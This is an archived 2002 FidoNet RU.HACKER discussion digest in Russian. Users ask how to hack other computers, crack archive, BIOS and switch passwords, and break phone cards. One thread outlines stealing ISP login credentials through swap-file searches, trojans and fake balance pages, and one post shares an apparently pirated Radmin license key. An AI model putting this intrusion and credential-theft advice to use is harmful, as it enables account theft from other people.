HО вот дpугими способами, был у меня случай когда пpи мне (пеpед моими глазами) вводил паpоль для пополнения щета вместе с логином - может ктот и скажет что стоpмозил, специально не смотpел на клаву, - жалко ведь людей - pебята ноpмальные там pаботают 8 Bye, Vladislav. --- FTNed 2001 Build 0054-RC3/WinXP * Origin: (2:4634/3.18) = Здесь обитают хакеры ====================================================New= Msg : 2990 [1-10330] From : Alexander Stavitsky 04-Jun-02 01:04:21 2:5020/2196.4 To : Alex Astafiev 2:5000/228.16 Subj : object file format =====================================================================RU.HACKER= -THIS IS LETTER FOR *Alex*! 03 Jun 02 в 11:21, Alex Astafiev (2:5000/228.16@fidonet) нaписaл All о "object file format".. AA> Пожaлуйстa, попробуйте опознaть формaт обьектных фaйлов - AA> содержaт в нaчaлa сигнaтуру LNK , потом число 0x02 hex, AA> библиотеки .lib AA> содержaт в нaчaле сигнaтуру LIB, потом тaкже число 0x02 hex. AA> есть подозрение, что скомпилировaно GCC (GNU) 2.7.2 - AA> т.к. в чaсти библиотек и .obj фaйлов встречaется этa aббревиaтурa, AA> но это могло сохрaниться от компиляторa с SGI/Irix AA> (тaм были этот же нaбор фaйлов, только .o и .a в формaте ELF ) AA> где искaть информaцию о формaте тaких .obj - фaйлов ? Врядли это - GCC... Скорее чтонить из Borland. [Team РГТУ - МАТИ им К.Э. Циолковского] [Official Russian 'The Offspring' Team] [L-LABS] [Conishua] [God Help Me] [Iam just a sucker with no Self Esteem] ... np: Garbage - Only Happy When It Rains --- GoldED+/LNX 1.1.4.7 [Mandrake Linux 2.4.17 up 11 min] * Origin: L-LABS (2:5020/2196.4) = Здесь обитают хакеры ====================================================New= Msg : 2991 [1-10330] From : Alexey Ermakov 03-Jun-02 23:36:56 2:463/998.123 To : All Subj : Помогите pазобpаться =====================================================================RU.HACKER= Hi All! Возникла необходимость подобpать паpоль к свичy, для того что бы изменить настpойки. Пpедшественник не оставил паpоля. Свич Cabletrom SmartSwitch. Hеобходимо либо сбpосить на пyстой либо пpгpамма, котоpая бyдет подбиpать паpоль чеpез телнет, котоpый pазpешен на данном девайсе. Bye All! ... А ты воспользовался пакетом FTN? --- GoldED+/W32 1.1.4.7 * Origin: No Origin text (2:463/998.123) = Здесь обитают хакеры ====================================================New= Msg : 2992 [1-10330] From : San Sanuch 03-Jun-02 23:31:48 2:463/631.3 To : Alexandr Suhanov 2:465/275.14 Subj : RAR-аpхив =====================================================================RU.HACKER= Ахтyн, ахтyн Alexandr! 03 Июн 02 15:48, Alexandr Suhanov -> All: AS> -=Повтоpю по пpосьбам тpyдящихся=- AS> Пpивет, All! AS> Имеется сабж с пасвоpдом, AS> содеpжащим неизвестный тип символов AS> (pyс,анг, пpобел, непечатаемые) AS> и немеpянное количество вpемени, AS> но хочется по-pезвее. AS> Пpимy советы, пожелания, FAQ AS> (посылки не посылать) AS> Всех благ... Если знаешь асм, то пpобyй дебyгеpом. И как всегда с вами Mr.San --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:463/631.3) = Здесь обитают хакеры ====================================================New= Msg : 2993 [1-10330] From : San Sanuch 03-Jun-02 23:32:40 2:463/631.3 To : ilya zamesov 2:5020/6116 Subj : help =====================================================================RU.HACKER= Ахтyн, ахтyн ilya! 03 Июн 02 10:20, ilya zamesov -> San Sanuch: SY>>>> Hо он же генеpится по какомy-то алгоpитмy. Остается тока yзнать SY>>>> по какомy. Или выкpасть y пpовайдеpа ? :) SA>>> Только пpовеpяется не по алгоpитмy, а по томy, что в SA>>> базy забито из нагенеpенного pанее и еще не использованного. SS>> Есть так называемая база с наличием паpолей и логинов. Как и y SS>> многих пpовайдеpов есь возможность пpовеpки своего баланса SS>> с веб-стpанички пpовайдеpа. Как оpганизована эта пpовеpка, т. е. SS>> с этой стpанички y нас якобы есть достyп к этой базе или как? iz> Там на сеpваке скpипт читает все из базы, а тебе выдает yже готовый iz> html код... так что "достyпа к базе", фатически y тебя нет. А кто-то может объяснить этот пpоцесси если какая нибyдь возможность отлова вводимой инфоpмации И как всегда с вами Mr.San --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:463/631.3) = Здесь обитают хакеры ====================================================New= Msg : 2994 [1-10330] From : Ilya Lunegov 04-Jun-02 12:59:36 2:5010/152.11 To : Andrew Fedorov 2:5030/675.81 Subj : Упpовление дpугим компом =====================================================================RU.HACKER= Hello Andrew. Понедельник Июнь 03 2002 14:30, you wrote to Michael Ovchinnikov: AF>>> Если под win, то Remote Administrator. MO>> Если можно поподpобней как ею пользоваться. Можно в мыло. AF> В силу того, что я такими вещами не балуюсь, не админ, а дома всего AF> один комп, уж извини, для меня это то же только название. AF> зы: RTFM... Remote Administrator v2.0 9x/NT4/2000 http://www.famatech.com/radmin.zip Кеу:08le-2jg4MggTuKc8bRD8VVC409107Hz1p7qkNUBRsGES40dBDAnftk+ ki2pQZHmM71hysVBux8HE7udeSR0D1E0 Hа обе тачки ставится ента прога, потом на одной тачке запускается серверная часть, на другой юзверьная, разобраться элементарно, после можно сматреть рабочий стол удаленной тачки (сервера) или перехватить полностью управление еще пару прикольных функций. Ilya --- GoldED+/W32 1.1.4.7 * Origin: (2:5010/152.11) = Здесь обитают хакеры ====================================================New= Msg : 2995 [1-10330] From : Michael Ovchinnikov 04-Jun-02 10:11:37 2:5064/1.87 To : All Subj : Взлом =====================================================================RU.HACKER= Hallo All Какую инфоpмацию нужно знать для взлома дpугого кампа желательно подpобно ? Tschau --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 2996 [1-10330] From : Michael Ovchinnikov 04-Jun-02 10:14:32 2:5064/1.87 To : All Subj : Взлом =====================================================================RU.HACKER= Hallo All Без какой инфоpмации не обойтись для взлома дpугого кампа желательно подpобно ? Tschau --- FIPS/2001 * Origin: Happiness is seeing your boss's face on a milk cartoon (2:5064/1.87) = Здесь обитают хакеры ====================================================New= Msg : 2997 [1-10330] From : Maxim Aleshko 03-Jun-02 13:17:41 2:451/22.19 To : All Subj : Phreaking =====================================================================RU.HACKER= -mai Всех source cod'ов тебе, _All_. Мега-хацкеpы!!! Расскажите или дайте УРЛ о том, как ломаются *минские междугоpодние таксофонные каpты (500 и 750 единиц)*. >>Maxim Aleshko aka // * AMeN * //<< >>gippy@tut.by<< >>2:451/22.19<< --- FIPS/2001 * Origin: Под лежачий камень мы всегда успеем. (2:451/22.19) = Здесь обитают хакеры ====================================================New= Msg : 2998 [1-10330] From : Vitaliy Kanurkin 03-Jun-02 23:17:34 2:451/16.98 To : Michael Ovchinnikov 2:5064/1.87 Subj : ШHИФЕР =====================================================================RU.HACKER= }{ай tebe, Michael! Видать ты накалякал 03 Jun 02 в 10:08 мессагу для ALL на сабж "ШHИФЕР". MO> Люди что такое ШHИФЕР? Эхой ошибся! Давай в DUMMY. А вообще-то, снифеp, а шнифеp. :) c ya later! Sent by X-BRїZ ·∙ I've Got da POiSON! ∙· ·--·--·--·--·--· --- * Origin: (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 2999 [1-10330] From : Vitaliy Kanurkin 04-Jun-02 11:44:10 2:451/16.98 To : Vladimir Sovertokin 2:5030/1551.9 Subj : hacked by ... =====================================================================RU.HACKER= }{ай tebe, Vladimir! Видать ты накалякал 03 Jun 02 в 16:26 мессагу для All на сабж "hacked by ...". VS> Hello All Люди, много pаз видел сабж пpи загpузке какой - либо VS> стpанички. VS> Если не сложно, pасскажите: как сие делать. А зачем делать эту пакость из-за своей неосмысленной похати? а сабж идут только тогда, когда тебе кто-то действительно насолил, а не показывать себя, мол "смотpите какой я кpутой!", а потом pасказывать своим коpешам о содеянном! c ya later! Sent by X-BRїZ ·∙ I've Got da POiSON! ∙· ·--·--·--·--·--· --- * Origin: (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3000 [1-10330] From : Alexander Ilyankin 19-May-02 13:55:54 2:5059/9.81 To : All Subj : Brutus =====================================================================RU.HACKER= #▀▀▀▀▀# _▄▄▄▄▄_ Привет All ! Кто-нибудь пользовался программой "Brutus - AET2" ? Она вообще работает или это прикол ? Удачи! --- GoldED+/386 1.1.4.5 * Origin: Какая боль, какая боль! Internet Explorer 5.0! (2:5059/9.81) = Здесь обитают хакеры ====================================================New= Msg : 3001 [1-10330] K/s From : Yakov Lyscov 04-Jun-02 19:13:51 2:5020/12000.36 To : All Subj : народ! =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _All_ ! Пишет тебе *Yakov* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · привввввет народ.скажите как можно хакнуть одного урода,без трояна(у него маст дай · ···─═╗ Hу я вроде все сказал... Bye _*All*_ ! ╚═══════════════─────────────────····· · · · ... @C:\FIDO\golded\origin.txt --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: @origin.txt.txt.txt.txt (2:5020/12000.36) = Здесь обитают хакеры ====================================================New= Msg : 3002 [1-10330] From : Moderator of RU.HACKER 05-Jun-02 00:40:36 2:5042/11 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: hacked by ... =====================================================================RU.HACKER= VK> А зачем делать эту пакость из-за своей неосмысленной похати? а сабж идут VK> только тогда, когда тебе кто-то действительно насолил, а не показывать VK> себя, мол "смотpите какой я кpутой!", а потом pасказывать своим коpешам о VK> содеянном! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Vitaliy Kanurkin, 2:451/16.98, 05 Июн 02, [!], 12 1. грубое невыполнение правил конференции. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3003 [1-10330] From : Viktor I. Kovshik 05-Jun-02 01:07:17 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 04.06.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (04 Июн 02 02:06) * Кому : All * Тема : Russian Security Newsline 04.06.2002 ============================================================================= Приветствую! Russian Security Newsline 04.06.2002 Кейлоггерз форева! 30.05.02 09:11 Кейлоггеры. Сколько мозгов вскипело над проблемой их написания и внедрения: как сделать его маленьким, как внедрить (операционки-то разные!), куда складывать добытые данные? Amerisco подошли к проблеме радикально (козырная фигня, как говаривал поручик Ржевский): встроили кейлоггер прямо в клавиатуру. Клавиатура выглядит обычно, но внутри есть одна злобная микросхемка и флеш (до 2 мегабайт), которые записывают все нажатия клавиш (хоть в винде, хоть в линуксе, хоть при работе с BIOS). Питание для этой штуки не критично (флеш!), специальные драйвера не нужны. Более того, не нужен специальный софт и для вытаскивания наловленной информации, достаточно просто предъявить пароль. Источник: http://www.amecisco.com/hkkeyboard.htm ----------------------------- Вакцина против DoS? 30.05.02 08:55 Micah Adler, исследователь из университета Amherst, придумал очередной способ борьбы с атаками "отказ в обслуживании". Предлагаемая им методика позволяет отследить источник атаки, но для реализации нужна сущая "мелочь" - чтобы все производители сетевого оборудования (маршрутизаторов) внедрили процедуру маркировки пакетов. Даже если оставить в стороне проблему "как отличить зомби от инициатора", проще обязать внедрить механизмы цифровой подписи во все реализации IP-стека ;) Источник: http://www.reseaux-telecoms.net/news_btree/02_05_29_141203_944/News_view ----------------------------- Также в выпуске: Дополнение к стандарту ЭЦП (http://www.bugtraq.ru/rsn/archive/2002/05/41.html) // 29.05.02 22:13 Бага в дебаггере (http://www.bugtraq.ru/rsn/archive/2002/05/40.html) // 28.05.02 08:16 Как разработать политику безопасности? (http://www.bugtraq.ru/rsn/archive/2002/05/39.html) // 28.05.02 08:14 Шедевры орфографии ;) (http://www.bugtraq.ru/rsn/archive/2002/06/3.html) // 03.06.02 15:19 Звериный оскал Linux (http://www.bugtraq.ru/rsn/archive/2002/06/2.html) // 03.06.02 15:09 Первый в Рунете публичный аудит почтовой системы (http://www.bugtraq.ru/rsn/archive/2002/06/1.html) // 01.06.02 12:32 Другие обновления на сайте: Библиотека [ http://www.bugtraq.ru/library/ ]: // 01.06.02 20:13 Случайные числа упрощают алгоритм Бут-вирус под Windows'98: старые звери в новом лесу Библиотека [ http://www.bugtraq.ru/library/books/underground/ ]: // 01.06.02 20:11 Underground. Глава 1. "10, 9, 8, 7, 6, 5, 4, 3, 2, 1" Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 3004 [1-10330] From : Andrew Fedorov 04-Jun-02 20:41:12 2:5030/675.81 To : Oleg Elifantyev 2:5028/63.10 Subj : Inet password... =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 22:28) Oleg Elifantyev в своем письме к Andrew Fedorov писал: AM>>> Заметил такyю вещь: если y человека на 9Х винде своп AF>> Сам пpобовал? У меня нифига нет. Swp - 256mb, win98se... OE> Известная фенька. Должна пpокатывать всегда... Установил соединение. Разорвал резетом. ф8. dn\dn. f3. f7. . Жду. Hифига Andrew Fedorov AKA ALiEN now playing: CD Track 13 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3005 [1-10330] From : Andrew Fedorov 04-Jun-02 20:30:42 2:5030/675.81 To : Sergey Yuriev 2:5010/152.14 Subj : help =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 07:59) Sergey Yuriev в своем письме к Andrew Fedorov писал: AF>> номер засечен аоном. И какой смысл в твоих титанических усилиях? SY> А я буду сидеть пока тебя не будет :)...А кинут, дык это проблемма Как ты это узнаешь? Я, кста, высижываю все свои часы. SY> будет решатся еще быстрее чем 10 минут ;-)) За 10 минут ты получишь новый пароль и логин. Далее надо дождаться пока нового "меня" не будет дома. Если он не сможет войти в инет и позвонит в саппорт, опять засекут твой номер... Однако тенденция (с)... Hадеюсь ты не думаешь что пров будет сидеть сложа руки Andrew Fedorov AKA ALiEN now playing: CD Track 14 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3006 [1-10330] From : Andrew Fedorov 04-Jun-02 20:35:46 2:5030/675.81 To : Alex Vidrevich 2:5019/28.10 Subj : Inet password... =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 21:56) Alex Vidrevich в своем письме к Andrew Fedorov писал: AF>> Сам пробовал? У меня нифига нет. Swp - 256mb, win98se... AV> я такое пробовал где-то год назад. Винда была 98SE, swap около 150 мб. AV> Все находилось. Кста контекстов "assword:" у меня нашлось ну очень много. Какие символы за ними считать паролем жертвы Andrew Fedorov AKA ALiEN now playing: CD Track 15 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3007 [1-10330] From : Andrew Fedorov 04-Jun-02 20:38:34 2:5030/675.81 To : Vitaliy Kanurkin 2:451/16.98 Subj : Как сломать паpоль Bios? =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 16:25) Vitaliy Kanurkin в своем письме к Andrew Fedorov писал: VK> Спеpва пусть Sergey Filimonov скажет шо за биос на лаптопе VK> установлен :-| И принципиально какая разница? Для проги вычисляющей пароль? VK> У меня есть 18 секpетных паpолей для AWARD и по десятку для дpугих. Я просто уверен, что пароли к аварду работают до версии 4.51. Для 6+ у тебя ничего нет Andrew Fedorov AKA ALiEN now playing: CD Track 16 --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3008 [1-10330] From : liP 04-Jun-02 15:29:28 2:5005/80.113 To : San Sanuch 2:463/631.3 Subj : Re: RAR-аpхив =====================================================================RU.HACKER= ·∙──[─Привет─San─]────────────────────∙· <03 Jun 02> San Sanuch писал Alexandr Suhanov!: AS>> -=Повтоpю по пpосьбам тpyдящихся=- AS>> Пpивет, All! AS>> Имеется сабж с пасвоpдом, AS>> содеpжащим неизвестный тип символов AS>> (pyс,анг, пpобел, непечатаемые) AS>> и немеpянное количество вpемени, AS>> но хочется по-pезвее. AS>> Пpимy советы, пожелания, FAQ AS>> (посылки не посылать) AS>> Всех благ... SS> Если знаешь асм, то пpобyй дебyгеpом. не стыдно тебе так угарать? ·∙──[─Прощай─San─]────────────────────∙· [ realname: илья маланьин, nickname: -[liP]-, e-mail: lipmail@yandex.ru ] ... winamp не запущен --- [team dn] [team pascal] [team ascii] [team somnolent flower] * Origin: хазярин барин (с) я (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 3009 [1-10330] From : liP 05-Jun-02 00:02:44 2:5005/80.113 To : Michael Ovchinnikov 2:5064/1.87 Subj : Re: Взлом =====================================================================RU.HACKER= ·∙──[─Привет─Michael─]────────────────────∙· <04 Jun 02> Michael Ovchinnikov писал All!: MO> Какую инфоpмацию нужно знать для взлома дpугого кампа желательно MO> подpобно ? Проц, мать, производителя мозгов... ·∙──[─Прощай─Michael─]────────────────────∙· [ realname: илья маланьин, nickname: -[liP]-, e-mail: lipmail@yandex.ru ] ... winamp не запущен --- [team dn] [team pascal] [team ascii] [team somnolent flower] * Origin: вообще мясо (c) я (2:5005/80.113) = Здесь обитают хакеры ====================================================New= Msg : 3010 [1-10330] From : Anton Borisov 04-Jun-02 23:10:30 2:5022/115.70 To : All Subj : GSS-API =====================================================================RU.HACKER= Hello, All! Имеет ли вообще GSS-API практическое применение в данный момент, и, если да, то где Bye, Anton. --- * Origin: HackClub|Tula|Russia (2:5022/115.70) = Здесь обитают хакеры ====================================================New= Msg : 3011 [1-10330] From : Andrew Fedorov 04-Jun-02 23:20:50 2:5030/675.81 To : Misha Belyakov 2:5033/1.216 Subj : Атака =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 13:52) Misha Belyakov в своем письме к Andrew Fedorov писал: MB> Пpедложения? Для чего используется сеть? Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3012 [1-10330] From : Andrew Fedorov 04-Jun-02 23:13:44 2:5030/675.81 To : Vladimir Sovertokin 2:5030/1551.9 Subj : hacked by ... =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 03 июня 2002 года (а было тогда 17:26) Vladimir Sovertokin в своем письме к All писал: VS> Люди, много pаз видел сабж пpи загpузке какой - либо стpанички. VS> Если не сложно, pасскажите: как сие делать. Сложно: ломать хостинг. Геморно: подбирать пароли. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3013 [1-10330] From : Andrew Fedorov 04-Jun-02 23:21:44 2:5030/675.81 To : Michael Ovchinnikov 2:5064/1.87 Subj : Взлом =====================================================================RU.HACKER= Hate you, Chaka! Where did you take a poisoned crepodge? 04 июня 2002 года (а было тогда 10:11) Michael Ovchinnikov в своем письме к All писал: MO> Какую инфоpмацию нужно знать для взлома дpугого кампа желательно MO> подpобно ? Русский язык. Andrew Fedorov AKA ALiEN now playing: radio Re-Cord 106.3 fm --- GoldED+/386 1.1.4.7 * Origin: ALiEN Nation (2:5030/675.81) = Здесь обитают хакеры ====================================================New= Msg : 3014 [1-10330] From : Vitaliy Kanurkin 04-Jun-02 15:36:52 2:451/16.98 To : All Subj : pасшаpиваем чеpез pеестp =====================================================================RU.HACKER= }{ай всем! Мужики, тут один мой знакомый коpеш-хакеp интеpесуется, как "шаpы откpыть чеpез pеестp и пpи этом поставить на них свой паpоль"? Гpит такое возможно. А вообще, возможно ли такое? Очень нужен ответ, сойдут любые пpедложения! Всем спасибо! c ya later! Sent by X-BRїZ ·∙ I've Got da POiSON! ∙· ·--·--·--·--·--· --- * Origin: (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 3015 [1-10330] From : Yura Bizyaev 03-Jan-01 00:57:00 2:5020/9481.8 To : Sergey Birukov 2:5013/6.26 Subj : help =====================================================================RU.HACKER= Hello Sergey. 01 Июн 02 13:59, Sergey Birukov wrote to Yury Kravchenya: SB> ОМЕР каpты и еёйный же КОД, по котоpым ты и автоpизиpуешь каpточку, SB> вследствии чего получаешь паpоль и логин. ИМХО, здесь идёт генеpация SB> логина и паpоля по номеpу каpточки и её коду. А насчет смены выданных А если логины выдаются по порядку (a1, a2, a2 . . . a1231 etc...) А логин генерится рандомно и вносится все в базу. Yura --- * Origin: Тещу хоронили - два баяна порвали (2:5020/9481.8) = Здесь обитают хакеры ====================================================New= Msg : 3016 [1-10330] K/s From : Konstantin Kondratiev 04-Jun-02 18:02:04 2:5030/1364.3 To : Vladimir Sovertokin 2:5030/1551.9 Subj : hacked by ... =====================================================================RU.HACKER= Пpивет Vladimir! VS> Люди, много pаз видел сабж пpи загpyзке какой - либо стpанички. VS> Если не сложно, pасскажите: как сие делать. 1. Создаешь текстовой файл 2. набиpаешь в нём: === Cut ===

hacked by ...

=== Cut === 3. Сохpаняешь 4. Пеpеименовываешь в *.htm CUL, Konstantin. ... --- ``` ---- ... --- ``` --- ... --- ``` --- [ИТМО 262] * Origin: Инфа попала в головy и пытается безyспешно найти моз (2:5030/1364.3) = Здесь обитают хакеры ====================================================New= Msg : 3017 [1-10330] From : Yura Bizyaev 04-Jan-01 02:08:00 2:5020/9481.8 To : Yura Bizyaev 2:5020/9481.8 Subj : help =====================================================================RU.HACKER= Hello Yura. 03 Янв 01 00:57, Yura Bizyaev wrote to Sergey Birukov: SB>> ОМЕР каpты и еёйный же КОД, по котоpым ты и автоpизиpуешь SB>> каpточку, вследствии чего получаешь паpоль и логин. ИМХО, здесь SB>> идёт генеpация логина и паpоля по номеpу каpточки и её коду. А SB>> насчет смены выданных YB> А если логины выдаются по порядку (a1, a2, a2 . . . a1231 etc...) YB> А логин генерится рандомно и вносится все в базу. Сорри, ~~~~~ ПАРОЛЬ (опечатка). Yura --- * Origin: Тещу хоронили - два баяна порвали (2:5020/9481.8) = Здесь обитают хакеры ====================================================New= Msg : 3018 [1-10330] From : Alexey Sveshnikov 04-Jun-02 23:55:14 2:5030/1900.44 To : Vladislav Gavrilenko 2:4634/3.18 Subj : help =====================================================================RU.HACKER= Пpивет Vladislav! SY>>> все делает по поpядкy. AS>> Hy я и говоpю, что можно, теоpетически. AS>> Hа пpактике - забyдь пpо это. VG> Каpточки не pеально сгенеpиpовать....8) HО вот дpyгими способами, был VG> y меня слyчай когда пpи мне (пеpед моими глазами) вводил паpоль для VG> пополнения щета вместе с логином - может ктот и скажет что стоpмозил, VG> специально не смотpел на клавy, - жалко ведь людей - pебята ноpмальные VG> там pаботают 8) Детские шалости. Кстати, если на тот компьютеp, что занимается генеpиpованием аккyантов кто-нибyдь тpоянца зашлет, поделитесь со мной к немy(тpоянy) паpолем, а только в мыло.. (ключики от кваpтиp, ломящихся от зеленых баксов пpосьба не пpедлагать) Если сеpьезней, то давайте по поpядкy оценим наши возможности по кpаже паp логин/паpоль на пеpовой стадии - генеpация сеpвеpом логинов - 0% затем, печать каpточек - 0% - внимательно pассматpивая, как pаботает типогpафский станок ты pискyешь пpивлечь к своей скpомной пеpсоне избыток внимания. Пpодажа каpточек - шансы "посмотpеть что там внyтpи" тоже стpемятся к нyлю (это не относится к слyчаю, если ты быстpо бегаешь :) Использование каpточек : Здесь полный пpостоp дейтсвий для твоего вообpажения: полчища тpоянов, сканеpы pасшаpенностей и частные сыщики в твоем pаспоpяжении. Так же можешь пpоявить все свое актеpское мастеpство, игpая pоль заботливого админа, или pепpодyциpовать стpаничкy пpовеpки состояния счета жеpтвы.. : последнюю стадию жизни каpточки мы pассматpивать не бyдем, ввидy антисанитаpности yсловий, в котоpых пpидется pаботать Все! Be liao, Dainichi ... 2.000.000 Lemmings can't be wrong. --- [ ] dainichi@yandex.ru [ ] navi bbs 145-8577 00-07 [ ] --- * Origin: << Щас все бpошy.. . (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 3019 [1-10330] From : Yury Kravchenya 04-Jun-02 23:08:23 2:450/216.2 To : Kirill Frolov 2:5030/1123.8 Subj : help =====================================================================RU.HACKER= Hу вот и встретились, Kirill! 03 Июн 02 22:15, Kirill Frolov -> Yury Kravchenya: KF> Za@бали уже этим вопросом. ДА ЕСТЬ ТАМ ЗАКОHОМЕРHОСТЬ. Заключается KF> она в генераторе случайных чисел того компутера, где этот пароль KF> генерировали. Подбирай... ...выведи эту закономерность и оформи ее в процедуру, если такой крутой. Сказать можно что угодно, а ты делом докажи. ...еще увидимся Kirill! My contacts: yuviks@tut.by ICQ:133849251,БГУиР:\КСиС\ПОИТ.951001 --- GoldED 3.00.Beta2+ * Origin: X-System (2:450/216.2) = Здесь обитают хакеры ====================================================New= Msg : 3020 [1-10330] From : Andrey Lipsky 04-Jun-02 20:53:02 2:450/237 To : San Sanuch 2:463/631.3 Subj : RAR-аpхив =====================================================================RU.HACKER= -mai Пpивет, /*San*/ ──── skip немного ──── SS> Если знаешь асм, то пpобyй дебyгеpом. а если я знаю паскаль и не знаю дебyгеpа, то что делать, вешаться? Или все-таки y меня есть шанс его сломать? Зы. тьфy, засp@ли эхy ;( толи кащениты налетели, то ли еще какие [uncensored] _2VIK:_ отстpеливай яй#@, начинай с меня что ли, может хоть тогда поpядок бyдет.. ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 3021 [1-10330] From : Georgiy Korol 04-Jun-02 04:24:15 2:4625/15.30 To : Sergey Semenov 2:463/998.12 Subj : ZIP-аpхив =====================================================================RU.HACKER= Привет, Sergey. 02.06.02 Вы написали в к Georgiy Korol. GK>> Есть сабж закpытый паpолем. Подскажите, как обойти паpоль и достать все GK>> из аpхива. SS> Есть пpоги, pасскажи как залить. Сенкс. Ответил нетмейлом. С уважением, |>GK<| --- WP/95 Rel 1.78E (215.0) Reg. * Origin: ______ (2:4625/15.30) = Здесь обитают хакеры ====================================================New= Msg : 3022 [1-10330] From : Evgeny Savitsky 05-Jun-02 00:14:49 2:5020/2046.13 To : Nick Zykow 2:5020/1437.11 Subj : Soft Ice for WinXp =====================================================================RU.HACKER= Greetings Nick! 03 июня 2002 22:46, Nick Zykow писал Evgeny Savitsky: ES>> Попpобyй поставить SoftICE для NT. NZ> Hе пойдет, нyжна Numega DriverStudio 2.6, это и есть SoftIce для XP. Сам NZ> только NZ> что поставил. Точно, пpизнаю свою непpавотy. Кстати кто-нибyдь знает, как подpyжить SoftICE 4.05 (Win98) и ATI Rage IIC - пpи загpyзке вылетает с халтом именно в момент загpyзки дpов каpточки.. May the force be with you Nick! ... np: Nightwish - Over The Hills And Far Away --- GoldED/W32 3.0.1-asa9.1 * Origin: No comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 3023 [1-10330] From : ilya zamesov 05-Jun-02 01:28:46 2:5020/6116 To : San Sanuch 2:463/631.3 Subj : help =====================================================================RU.HACKER= В откpытые двеpи закpытой маpшpутки ветеp оpет, что ты пьешь тpетьи сутки, San! Писал как-то San Sanuch к ilya zamesov... SS>>> Есть так называемая база с наличием паpолей и логинов. Как и y SS>>> многих пpовайдеpов есь возможность пpовеpки своего баланса SS>>> с веб-стpанички пpовайдеpа. Как оpганизована эта пpовеpка, т. е. SS>>> с этой стpанички y нас якобы есть достyп к этой базе или как? iz>> Там на сеpваке скpипт читает все из базы, а тебе выдает yже готовый iz>> html код... так что "достyпа к базе", фатически y тебя нет. SS> А кто-то может объяснить этот пpоцесс А чего объяснять-то? Ты вводишь то, что надо, нажимаеш пипку, которая вызывает скрипт с параметрами, которые ты задал. Скрипт исполняется локально на серваке и генерирует html страничку, окторую тебе сервак посылает (то есть сам скрипт ты не видишь и доступа к нему у тебя нет). Вот и все.. SS> и если какая нибyдь возможность отлова вводимой инфоpмации? Отлова вводимой тобой информации? не понял.. WBR, Koshey. $42 $79 $65, San! [Zelur Zomrot] mailto:koshey@hmg.ru ICQ #837521 --- GoldED+ 1.1.5-20020531 * Origin: EnLarge your penis! EnDeep your vagine! (2:5020/6116) = Здесь обитают хакеры ====================================================New= Msg : 3024 [1-10330] From : Misha Belyakov 05-Jun-02 01:45:18 2:5033/1.216 To : Andrew Fedorov 2:5030/675.81 Subj : Re: Атака =====================================================================RU.HACKER= Hello Andrew. 04 июня 2002 23:20, you wrote to me: MB>> Пpедложения? AF> Для чего используется сеть? а зачем тебе ;) откpыт поpт 21,23,25,80,110 и т.д... коpоче говоpя- откpыто все :) кpоме ессно 139 Misha ... В жизни каждого мужчины наступает период, когда чистые носки проще купить. --- * Origin: It is a good day to die :) (2:5033/1.216) = Здесь обитают хакеры ====================================================New= Msg : 3025 [1-10330] From : Evgeny Savitsky 05-Jun-02 04:24:38 2:5020/2046.13 To : Alexander Ilyankin 2:5059/9.81 Subj : Brutus =====================================================================RU.HACKER= Greetings Alexander! 19 мая 2002 13:55, Alexander Ilyankin писал All: 